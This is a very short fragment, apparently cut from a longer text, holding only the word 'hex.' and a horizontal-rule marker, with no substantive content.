hex. ---